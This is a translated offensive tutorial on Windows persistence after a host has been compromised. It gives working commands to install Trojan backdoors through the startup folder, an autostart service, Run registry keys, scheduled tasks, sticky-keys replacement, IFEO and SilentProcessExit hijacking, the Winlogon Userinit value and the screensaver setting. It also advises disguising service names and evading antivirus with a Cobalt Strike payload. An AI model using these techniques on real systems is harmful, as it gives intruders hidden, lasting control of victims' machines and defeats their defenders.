Windows permission maintenance—self-starting&image hijacking&sticky keys&auxiliary screensaver backdoor&WinLogon
1. Preface
In Windows systems, the way many backdoors are used is not very distinguishable between a domain and a single machine. You just need to consider how to bounce the shell back when there is no network. For example, a host without a network in the domain and a Hosts with a network are forwarded to hosts without a network through the network host in the early stage. So can our Trojan be set up like this? Set up a forward Trojan in the non-network and let it run, and set up a forward Trojan in the network. Let the reverse Trojan run, then when we connect, we only need to connect to the reverse Trojan, and then use this reverse Trojan to connect to the forward Trojan, and that's it.
Of course, the above are all ideal environments, and the actual environment may be more complicated, so you still need to think about it carefully.
This time, Windows permission maintenance is basically tested in a stand-alone environment. In fact, the effect is the same as testing in a domain. However, relatively speaking, in the domain, you need to consider whether there is a network and how to get out of the network.
2. Self-starting
You must all know the so-called self-start. Usually you will find that when you download a lot of software on your computer, one of them will turn on self-start. In fact, it is to embed the software program into the system's self-start. When you turn on the computer next time , it will run automatically.
2.1. Path loading
Path loading means placing the Trojan file in the system's self-starting directory to execute the file.
2.1.1. Placing files
It should be noted here that usually the systems we use are Chinese versions. Some systems may have been adjusted so that everything displayed in the directory is in English, while some may appear in Chinese. This is the case with the virtual machine below. .
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ##英文
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\开始菜单\程序\启动\ ##中文
2.1.2. Restart the host
After restarting the host, I found that the host came online automatically, but there still seemed to be a slight problem. Several black pop-ups appeared inexplicably on the host. Experienced people would definitely be suspicious, but I don’t know if it was mine. There is a problem with the environment.
2.2. Service loading
Service loading is to use the service program to automatically go online. For example, create a service, point the service to the Trojan, and adjust the startup type to automatic. Then the Trojan will be automatically executed the next time the computer is turned on.
2.2.1. Creating services
What you need to know here is that after obtaining the target host, the current operations are to maintain permissions, rather than how to obtain permissions or obtain the host.
To create a service here, you need to elevate your rights before creating it. Ordinary administrator rights seem to be unable to create services. At the same time, it is best to imitate the name of the service by imitating the necessary program, such as server, you can add an s, etc...
sc create Muma binPath= C:\1\3000.exe start= auto #创建自启动服务 路径执行木马
sc delete Muma #删除该服务
2.2.2. View services
It can be seen that the service is bound to a Trojan. At the same time, these Trojans that rebound shells are relatively small, and they are basically invisible operations when running.
2.2.3. Restart the host
Restarting the host here is to allow the system to load the service. The newly created service cannot be run directly. Of course, you can also run it manually. However, we also want to ensure that it can continue to be used in the future, so there is no need to rush to run the program.
Just wait for the target host to restart.
2.3. Registry loading
Registry loading is to add the Trojan to the registry and let the registry load.
2.3.1. Add startup items
Different types of registry paths here are different. There are those for the current user and those directly for the server. For the current user, you can basically add them after obtaining the user permissions, and the server also has system permissions. This needs to be provided. Right.
当前用户键值注册表路径:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
服务器键值注册表路径(需要管理员权限):
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\1\3000.exe"
2.3.2. View the registry
regedit ##查看注册表
2.3.3. Restart the host
After restarting, you can see that it went online successfully.
3. Plan tasks
Regarding the scheduled tasks of Windows, you can use the at command when the Windows system is <2012. From Windows server 2012 onwards, the at command cannot be used. Instead, it is changed to schtasks to add scheduled tasks. At the same time, the at command is executed with system permissions by default. .
You can search on Baidu for specific usage, so I won’t give a detailed demonstration here.
3.1. Create scheduled tasks
Create a scheduled task named TestService and run the 3000.exe program in the 1 directory under the C drive at 9.46 every day.
创建任务:schtasks /Create /TN TestService /SC DAILY /ST 09:46 /TR c:\1\3000.exe /RL HIGHEST
查看任务:SchTasks /Query /TN TestService
删除任务:SchTasks /Delete /TN TestService [/f]
3.2. Check the effect
As long as the time is up here, the scheduled task will run, and when it runs, the program will go online.
4. Sticky keys
Shift sticky key is a program that will automatically pop up when the user presses shift 5 times. In fact, it is not only the sticky key, but also various auxiliary functions. One of the characteristics of these auxiliary functions is that it will not work when the user is not logged in. can be triggered. Therefore, attackers are likely to achieve the purpose of maintaining permissions by tampering with the pointing programs of these auxiliary functions.
Sticky key location: C:\windows\system32\sethc.exe
4.1. Replacing Sticky Keys
One problem here is that it must have system permissions to execute, and the administrator cannot modify it.
move sethc.exe sethc1.exe
copy cmd.exe sethc.exe
4.2. Overall idea
The overall idea here is to modify the sticky key program, change the backdoor Trojan or cmd to the name of the sticky key program, and then press the Shift sticky key 5 times in the login window to call it.
However, it cannot be used in higher versions of Windows systems.
5. Image Hijacking
Image hijacking is achieved by using the IFEO (Image File Execution Options) function of Windows. IFEO is actually a normal function of Windows, mainly used for debugging programs. Its original intention is to open the debugger when the program starts to debug the program, so that the program can be observed in the debugger in an environment that is difficult to reproduce. Behavior.
To put it simply, the program is hijacked by modifying the registry specified by the program. When the program is run, the backdoor program we left actually runs.
When a program wants to run, it will check the registry. If there is a specified program and the debugger is turned on, the program specified by gebuggr will be executed first, which will cause image hijacking.
5.1. View the registry
By looking at the registry, you will find that there are many exe programs under this registry. We can modify these entries to achieve the hijacking effect. Of course, we can also add a designated exe to achieve hijacking.
注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
5.2. Common hijacking test
Here we hijack Notepad into a calculator. Of course, the computer can also be modified into its own Trojan horse and put online.
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "c:\windows\system32\calc.exe" /reg:32
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "c:\windows\system32\calc.exe" /reg:32
5.3. Hidden hijacking test
Hidden hijacking is implemented with GlobalFlag, and is triggered after normal shutdown. That is to say, when Notepad is executed, the Trojan will not be executed. At the same time, Notepad can still run normally, which is equivalent to a senseless operation, but when it is closed When you open Notepad, the execution of the backdoor Trojan will be automatically triggered.
5.3.1. Operation demonstration
Let’s make some modifications here. Read the commands yourself and modify some contents to your own.
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\1\3000.exe"
5.3.2. Check the effect
Here we open Notepad and click to close it, and the target host will automatically come online.
6. Screensaver & Login
This is to use some programs that are triggered when logging in after locking the screen, and just add programs that still need to be run after these programs.
6.1. Cooperate with the file-free launch
In fact, it means to modify the registry and add the Trojan path to the corresponding value. When the login is triggered, the Trojan will be automatically executed.
6.1.1. View the registry
The value in is the program that will be triggered when the current user logs in. Here we will add the Trojan path after this value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.Userinit
6.1.2. Modify the registry
Permissions are required here, and it may not be possible to execute using the permissions of ordinary users, so you still need to escalate the privileges to operate.
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\Windows\System32\userinit.exe,C:\1\3000.exe"
6.1.3. Check the effect
You can see that you can go online after restarting or locking the screen and logging in again.
6.2. payload online
Here we use the payload in cs to go online.
6.2.1. Generate payload
Here select payload>payload generator>select listener>type select powershell command.
6.2.2. Modify the registry
It must be noted here that the payload must be exempt from killing, otherwise the percentage will be killed.
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\Windows\System32\userinit.exe,payload" ##要注意这个payload就是将cs生成的paylod复制上去,由于太大了,就不输入了。
6.2.3. View the registry
Here we check whether the registry has been modified. Since this is a virtual machine, it is not easy to take a screenshot, but you can see that the content was added later.
6.2.4. Check the effect
You can see that the login is triggered here and it goes online successfully.
6.3. Screensaver takes effect and executes the backdoor
Here you can also use the screen saver to execute the backdoor after it takes effect. A normal computer screen will automatically perform a screen saver after a period of time. However, here is when the screen saver is automatically executed and the backdoor is executed at the same time.
6.3.1. View the registry
If the screen saver is selected, HKEY_CURRENT_USER\Control Panel\Desktopthe value of SCRNSAVE.EXE in the registry is the corresponding screen saver. If this value is changed to our Trojan program, the Trojan will be triggered when the screen saver is turned on.
But I took a look here, and it seems that this program is not in my registry, which is inexplicable, but I found that I can add it myself.
6.3.2. Modify the registry
Modification here is equivalent to adding a Trojan horse.
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\1\3000.exe" /f
6.3.3. Check the effect
After locking the screen here, you can see that it is successfully online.
